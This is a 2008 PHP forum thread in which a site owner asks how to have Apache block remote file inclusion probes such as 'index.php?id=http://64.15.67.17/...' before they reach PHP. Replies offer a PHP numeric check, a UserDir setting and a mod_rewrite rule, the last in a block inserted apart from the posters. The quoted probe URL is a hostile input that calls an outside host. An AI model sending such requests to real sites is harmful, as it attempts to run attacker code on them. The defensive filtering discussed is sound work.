This is a discussion on "Apache blocking certain requests instead of php" within the PHP General forums, part of the PHP Programming Forums category.

I'm getting a lot of bogus requests in the form of "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a hundred a day per domain. The php script catches it, logs the request, sends an email report and replies with "access denied", but it takes processing which I'd rather not have php busy with. (The php script rejects anything where id=something_not_numeric.) Is there a way for apache to catch these requests before passing it to php? Is it more efficient for apache to handle this than php?

Arno

Arno Kuhl wrote:
> Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?

2 x yes. I think you could probably use <LocationMatch> and ban all access with "Deny from all".

/Per Jessen, Zürich

Arno Kuhl wrote:
> I'm getting a lot of bogus requests in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a
> hundred a day per domain. The php script catches it, logs the request, sends
> an email report and replies with "access denied", but it takes processing
> which I'd rather not have php busy with. (The php script rejects anything
> where id=something_not_numeric.) Is there a way for apache to catch these
> requests before passing it to php? Is it more efficient for apache to handle
> this than php?
>
> Arno
>

Yes, in Apache turn off userdir access

In your httpd.conf file do this.

UserDir disabled

That way it will not process a URL that starts with a tilde ~...

That should take care of it. Apache should then only report a 404 error to the error log for the given virtual host.

--
Jim Lucas

"Some men are born to greatness, some achieve greatness, and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
by William Shakespeare

> I'm getting a lot of bogus requests in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more
> than a hundred a day per domain. The php script catches it, logs the
> request, sends an email report and replies with "access denied", but
> it takes processing which I'd rather not have php busy with. (The php
> script rejects anything where id=something_not_numeric.) Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?
>
> Arno
>
> Yes, in Apache turn off userdir access
>
> In your httpd.conf file do this.
>
> UserDir disabled
>
> That way it will not process a URL that starts with a tilde ~...
>
> That should take care of it. Apache should then only report a 404 error to the error log for the given virtual host.
>
> --

Thanks for the reply. Is that correct though? I always thought in the example
http://mysite.com/index.php?id=http:...sona/logo.jpg?
the url started with index.php...

Most of the requests though look more like
http://mysite.com/index.php?id=http:....su/caleb.htm?
without the tilde.

I was hoping there's a way to tell apache to block requests where id=non_numeric.

Cheers
Arno

> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.

It's trying to do a remote inclusion.

It's easy for you to fix in php:

if (isset($_GET['id'])) {
    if (!is_numeric($_GET['id'])) {
        die("Die hacker die!");
    }
}

I'm sure there would be a way to do it with ModRewrite or something but it's 5 lines of code in php so I'd do it there *shrug*.

--
Postgresql & php tutorials
http://www.designmagick.com/

On Thursday 24 July 2008 09:14:55 Chris wrote:
> > I was hoping there's a way to tell apache to block requests where
> > id=non_numeric.
>
> It's trying to do a remote inclusion.
>
> It's easy for you to fix in php:
>
> if (isset($_GET['id'])) {
>     if (!is_numeric($_GET['id'])) {
>         die("Die hacker die!");

that's sudden! ;)

>     }
> }
>
> I'm sure there would be a way to do it with ModRewrite or something but
> it's 5 lines of code in php so I'd do it there *shrug*.
>
> --
> Postgresql & php tutorials
> http://www.designmagick.com/

--
---
Børge Holen
http://www.arivene.net

> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.
>
> It's trying to do a remote inclusion.
>
> It's easy for you to fix in php:
>
> if (isset($_GET['id'])) {
>     if (!is_numeric($_GET['id'])) {
>         die("Die hacker die!");
>     }
> }
>
> I'm sure there would be a way to do it with ModRewrite or something but it's 5 lines of code in php so I'd do it there *shrug*.
>
> --

Thanks, I'm already doing something like that, but I want to stop it getting to php.

Cheers
Arno

Børge Holen wrote:
> On Thursday 24 July 2008 09:14:55 Chris wrote:
>>> I was hoping there's a way to tell apache to block requests where
>>> id=non_numeric.
>> It's trying to do a remote inclusion.
>>
>> It's easy for you to fix in php:
>>
>> if (isset($_GET['id'])) {
>>     if (!is_numeric($_GET['id'])) {
>>         die("Die hacker die!");
>
> that's sudden! ;)

ok maybe a bit harsh :P

stop hacker stop ?

;)

--
Postgresql & php tutorials
http://www.designmagick.com/

> Thanks, I'm already doing something like that, but I want to stop it getting
> to php.

http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html

Ask on an apache list how to use it.

--
Postgresql & php tutorials
http://www.designmagick.com/

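One way to do what Arno asks with the mod_rewrite module linked above, as an added example that is not from any poster in this thread. It assumes mod_rewrite is loaded and that index.php sits at the document root, as in the quoted requests.

```apache
# Added example, not code from the thread.
# Assumptions: mod_rewrite is loaded; the script is /index.php at the
# document root; rules live in the server/vhost config or in .htaccess
# (the optional leading slash in the pattern covers both contexts).
RewriteEngine On

# %{QUERY_STRING} is the raw, undecoded query string. The condition matches
# when some "id" parameter is empty or contains any character other than 0-9:
#   id=http://host/file?   -> match    (refused)
#   id=12abc               -> match    (refused)
#   id=%31                 -> match    (refused: '%' is not a digit)
#   id=                    -> match    (refused)
#   id=42                  -> no match (handed to PHP)
#   page=2&id=42           -> no match (handed to PHP)
#   pid=abc                -> no match (different parameter name)
RewriteCond %{QUERY_STRING} (^|&)id=([0-9]*[^0-9&][^&]*)?(&|$)

# "-" means no substitution; [F] returns 403 Forbidden, so the PHP script
# is never started for these requests. The pattern covers both "/" and
# "/index.php" in case index.php is served as the directory index.
RewriteRule ^/?(index\.php)?$ - [F]
```

Refused requests still appear in the access log with status 403. The rule inspects only the raw query string, so it reduces load but does not replace the numeric check in the PHP script, which should stay in place.
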
On Thursday 24 July 2008 09:38:57 Chris wrote:
> Børge Holen wrote:
> > On Thursday 24 July 2008 09:14:55 Chris wrote:
> >>> I was hoping there's a way to tell apache to block requests where
> >>> id=non_numeric.
> >>
> >> It's trying to do a remote inclusion.
> >>
> >> It's easy for you to fix in php:
> >>
> >> if (isset($_GET['id'])) {
> >>     if (!is_numeric($_GET['id'])) {
> >>         die("Die hacker die!");
> >
> > that's sudden! ;)
>
> ok maybe a bit harsh :P
>
> stop hacker stop ?

I prefer die("");
it leaves a bit of dissatisfaction for whoever generates the blank page

> ;)
>
> --
> Postgresql & php tutorials
> http://www.designmagick.com/

--
---
Børge Holen
http://www.arivene.net